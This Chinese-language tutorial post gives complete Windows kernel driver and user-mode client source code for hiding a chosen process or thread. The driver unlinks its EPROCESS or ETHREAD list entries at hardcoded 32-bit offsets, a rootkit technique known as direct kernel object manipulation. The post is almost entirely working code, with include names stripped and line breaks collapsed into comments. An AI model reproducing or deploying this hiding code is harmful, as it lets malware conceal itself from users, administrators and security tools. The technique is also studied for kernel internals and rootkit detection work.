02 进程断链、线程断链

进程断链

驱动代码

#include 
#include 
#include //操作码：0x0-0x7FF 被保留，0x800-0xFFF 可用
#define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS)//设备对象
PDEVICE_OBJECT devObj;
//符号链接
UNICODE_STRING symbolLink;NTSTATUS DEVICE_CONTROL_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp);
NTSTATUS DEVICE_CREATE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp);
NTSTATUS DEVICE_CLOSE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp);LIST_ENTRY* current_list ;
LIST_ENTRY* pre ;
LIST_ENTRY* next ;VOID DriverUnload(PDRIVER_OBJECT pDriver)
{//恢复current_list->Flink = pre;current_list->Blink = next;pre->Blink = current_list;next->Flink = current_list;//删除符号链接IoDeleteSymbolicLink(&symbolLink);//删除设备IoDeleteDevice(devObj);DbgPrint("卸载成功！！！\n");
}NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pRegPath)
{try {//unloadpDriver->DriverUnload = DriverUnload;//创建设备和3环通信UNICODE_STRING deviceName;RtlInitUnicodeString(&deviceName,L"\\Device\\firstDevice");NTSTATUS status = IoCreateDevice(pDriver,0,&deviceName,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_OPEN,FALSE,&devObj);DbgPrint("创建设备 ： %d~~\n", status);//创建符号链接 （3环需要这个符号链接才可以找到）RtlInitUnicodeString(&symbolLink,L"\\??\\MYKILLTOOL");IoCreateSymbolicLink(&symbolLink,&deviceName);//设置通信方式pDriver->Flags |= DO_BUFFERED_IO;//设置派遣函数pDriver->MajorFunction[IRP_MJ_CREATE] = DEVICE_CREATE_Dispatch;pDriver->MajorFunction[IRP_MJ_CLOSE] = DEVICE_CLOSE_Dispatch;pDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DEVICE_CONTROL_Dispatch;} __except(EXCEPTION_EXECUTE_HANDLER) {DbgPrint("run error~~\n");return STATUS_SUCCESS;}return STATUS_SUCCESS;
}NTSTATUS DEVICE_CONTROL_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{//从3环获取的PROCESS IDUINT32 DATA;NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST;//获取PIRP的数据PIO_STACK_LOCATION psLocation = IoGetCurrentIrpStackLocation(pIrp);//获取控制码ULONG code = psLocation->Parameters.DeviceIoControl.IoControlCode;//获取缓冲区地址（输入和输出都是同一个）PVOID bufferAddress = pIrp->AssociatedIrp.SystemBuffer;//3环发送的数据字节数ULONG threeLength = psLocation->Parameters.DeviceIoControl.InputBufferLength;//0环发送的数据字节数ULONG zeroLength = psLocation->Parameters.DeviceIoControl.OutputBufferLength;//PEPROCESSPEPROCESS peprocess;switch (code) {case HIDE:RtlMoveMemory(&DATA, bufferAddress,4);if (PsLookupProcessByProcessId((HANDLE)DATA,&peprocess) == STATUS_SUCCESS) //通过PID获取EPROCESS的地址{DbgPrint("PID : %d ，目前 EPROCESS 地址为：%08x\n", DATA, peprocess);//断链current_list = (LIST_ENTRY*)((UINT32)peprocess + 0x88);pre = current_list->Flink;next = current_list->Blink;current_list->Flink = NULL;current_list->Blink = NULL;pre->Blink = next;next->Flink = pre;DbgPrint("断链 success\n");}else{status = STATUS_INVALID_HANDLE;}break;default:break;}DbgPrint("3环发送的数据长度 %d~~\n", threeLength);DbgPrint("0环发送的数据长度 %d~~\n", zeroLength);DbgPrint("关闭进程 ： %08x~~\n", DATA);//设置返回状态,默认是失败的哦pIrp->IoStatus.Status = status;//返回给3环多少字节数据，没有填0pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp, IO_NO_INCREMENT);return STATUS_SUCCESS;}NTSTATUS DEVICE_CREATE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{DbgPrint("CREATE  SUCCESS~~\n");//设置返回状态pIrp->IoStatus.Status = STATUS_SUCCESS;//返回给3环多少字节数据，没有填0pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp,IO_NO_INCREMENT);return STATUS_SUCCESS;
}NTSTATUS DEVICE_CLOSE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{DbgPrint("CLOSE  SUCCESS~~\n");//设置返回状态pIrp->IoStatus.Status = STATUS_SUCCESS;//返回给3环多少字节数据，没有填0pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp, IO_NO_INCREMENT);return STATUS_SUCCESS;
}

3环代码

#include "stdafx.h"
#include 
#include 
#include #define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define SYMBOL_LINK_NAME L"\\\\.\\MYKILLTOOL"int main(int argc, char* argv[])
{//创建设备//create device linkHANDLE h_device = CreateFileW(SYMBOL_LINK_NAME,//创建或打开的文件或设备的名称GENERIC_READ | GENERIC_WRITE,//请求对文件或设备的访问权限0,//文件或设备请求的共享模式,参数为零且 CreateFile 成功，则文件或设备无法共享，并且无法在文件或设备的句柄关闭之前再次打开0,//确定返回的句柄是否可以由子进程继承OPEN_EXISTING,//仅当文件或设备存在时，才打开该文件或设备FILE_ATTRIBUTE_NORMAL,NULL);if (h_device == INVALID_HANDLE_VALUE){printf("访问驱动符号链接失败！\n");system("pause");return 0;}DWORD pid;DWORD outBuffer;DWORD lbret;printf("输入要隐藏的进程id : \n");scanf("%d",&pid);if (DeviceIoControl(h_device,HIDE,&pid,sizeof(pid),&outBuffer,sizeof(outBuffer),&lbret,NULL)){printf("success , please test......\n");}system("pause");CloseHandle(h_device);return 0;}

线程断链

驱动代码

#include 
#include 
#include //操作码：0x0-0x7FF 被保留，0x800-0xFFF 可用
#define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS)//设备对象
PDEVICE_OBJECT devObj;
//符号链接
UNICODE_STRING symbolLink;NTSTATUS DEVICE_CONTROL_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp);
NTSTATUS DEVICE_CREATE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp);
NTSTATUS DEVICE_CLOSE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp);LIST_ENTRY* current_list1 ;
LIST_ENTRY* pre1 ;
LIST_ENTRY* next1 ;LIST_ENTRY* current_list2;
LIST_ENTRY* pre2;
LIST_ENTRY* next2;VOID DriverUnload(PDRIVER_OBJECT pDriver)
{//恢复pre1->Blink = current_list1;next1->Flink = current_list1;///pre2->Blink = current_list2;next2->Flink = current_list2;//删除符号链接IoDeleteSymbolicLink(&symbolLink);//删除设备IoDeleteDevice(devObj);DbgPrint("卸载成功！！！\n");
}NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pRegPath)
{try {//unloadpDriver->DriverUnload = DriverUnload;//创建设备和3环通信UNICODE_STRING deviceName;RtlInitUnicodeString(&deviceName,L"\\Device\\firstDevice");NTSTATUS status = IoCreateDevice(pDriver,0,&deviceName,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_OPEN,FALSE,&devObj);DbgPrint("创建设备 ： %d~~\n", status);//创建符号链接 （3环需要这个符号链接才可以找到）RtlInitUnicodeString(&symbolLink,L"\\??\\MYKILLTOOL");IoCreateSymbolicLink(&symbolLink,&deviceName);//设置通信方式pDriver->Flags |= DO_BUFFERED_IO;//设置派遣函数pDriver->MajorFunction[IRP_MJ_CREATE] = DEVICE_CREATE_Dispatch;pDriver->MajorFunction[IRP_MJ_CLOSE] = DEVICE_CLOSE_Dispatch;pDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DEVICE_CONTROL_Dispatch;} __except(EXCEPTION_EXECUTE_HANDLER) {DbgPrint("run error~~\n");return STATUS_SUCCESS;}return STATUS_SUCCESS;
}NTSTATUS DEVICE_CONTROL_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{//从3环获取的PROCESS IDUINT32 DATA;NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST;//获取PIRP的数据PIO_STACK_LOCATION psLocation = IoGetCurrentIrpStackLocation(pIrp);//获取控制码ULONG code = psLocation->Parameters.DeviceIoControl.IoControlCode;//获取缓冲区地址（输入和输出都是同一个）PVOID bufferAddress = pIrp->AssociatedIrp.SystemBuffer;//3环发送的数据字节数ULONG threeLength = psLocation->Parameters.DeviceIoControl.InputBufferLength;//0环发送的数据字节数ULONG zeroLength = psLocation->Parameters.DeviceIoControl.OutputBufferLength;//PEPROCESSPETHREAD pethread;switch (code) {case HIDE:RtlMoveMemory(&DATA, bufferAddress,4);if (PsLookupThreadByThreadId(DATA, &pethread) == STATUS_SUCCESS) {DbgPrint("线程的地址为：%08x\n", pethread);//断链current_list1 = (LIST_ENTRY*)((UINT32)pethread + 0x22c);pre1 = current_list1->Flink;next1 = current_list1->Blink;pre1->Blink = next1;next1->Flink = pre1;///current_list2 = (LIST_ENTRY*)((UINT32)pethread + 0x1b0);pre2 = current_list2->Flink;next2 = current_list2->Blink;pre2->Blink = next2;next2->Flink = pre2;DbgPrint("断链 success\n");}else{status = STATUS_INVALID_HANDLE;}break;default:break;}DbgPrint("3环发送的数据长度 %d~~\n", threeLength);DbgPrint("0环发送的数据长度 %d~~\n", zeroLength);//设置返回状态,默认是失败的哦pIrp->IoStatus.Status = status;//返回给3环多少字节数据，没有填0pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp, IO_NO_INCREMENT);return STATUS_SUCCESS;
}NTSTATUS DEVICE_CREATE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{DbgPrint("CREATE  SUCCESS~~\n");//设置返回状态pIrp->IoStatus.Status = STATUS_SUCCESS;//返回给3环多少字节数据，没有填0pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp,IO_NO_INCREMENT);return STATUS_SUCCESS;
}NTSTATUS DEVICE_CLOSE_Dispatch(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{DbgPrint("CLOSE  SUCCESS~~\n");//设置返回状态pIrp->IoStatus.Status = STATUS_SUCCESS;//返回给3环多少字节数据，没有填0pIrp->IoStatus.Information = 0;IoCompleteRequest(pIrp, IO_NO_INCREMENT);return STATUS_SUCCESS;
}

3环代码

#include "stdafx.h"
#include 
#include 
#include #define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define SYMBOL_LINK_NAME L"\\\\.\\MYKILLTOOL"DWORD WINAPI ThreadProc(LPVOID lpParam)
{int i=0;while (1){printf("\n%d：线程老子还活着！！！\n",i++);Sleep(1500);}return 0;
}int main(int argc, char* argv[])
{//创建设备//create device linkHANDLE h_device = CreateFileW(SYMBOL_LINK_NAME,//创建或打开的文件或设备的名称GENERIC_READ | GENERIC_WRITE,//请求对文件或设备的访问权限0,//文件或设备请求的共享模式,参数为零且 CreateFile 成功，则文件或设备无法共享，并且无法在文件或设备的句柄关闭之前再次打开0,//确定返回的句柄是否可以由子进程继承OPEN_EXISTING,//仅当文件或设备存在时，才打开该文件或设备FILE_ATTRIBUTE_NORMAL,NULL);if (h_device == INVALID_HANDLE_VALUE){printf("访问驱动符号链接失败！\n");system("pause");return 0;}DWORD tid;DWORD outBuffer;DWORD lbret;HANDLE hthread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)ThreadProc,NULL,NULL,&tid);if (hthread==INVALID_HANDLE_VALUE){printf("create thread error \n");system("pause");return -1;}  system("pause");printf("隐藏命令正在发送，请查看线程数是否减少……\n");if (DeviceIoControl(h_device,HIDE,&tid,sizeof(tid),&outBuffer,sizeof(outBuffer),&lbret,NULL)){printf("hide thread %08x success , please test......\n",tid);}system("pause");CloseHandle(h_device);system("pause");return 0;
}

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！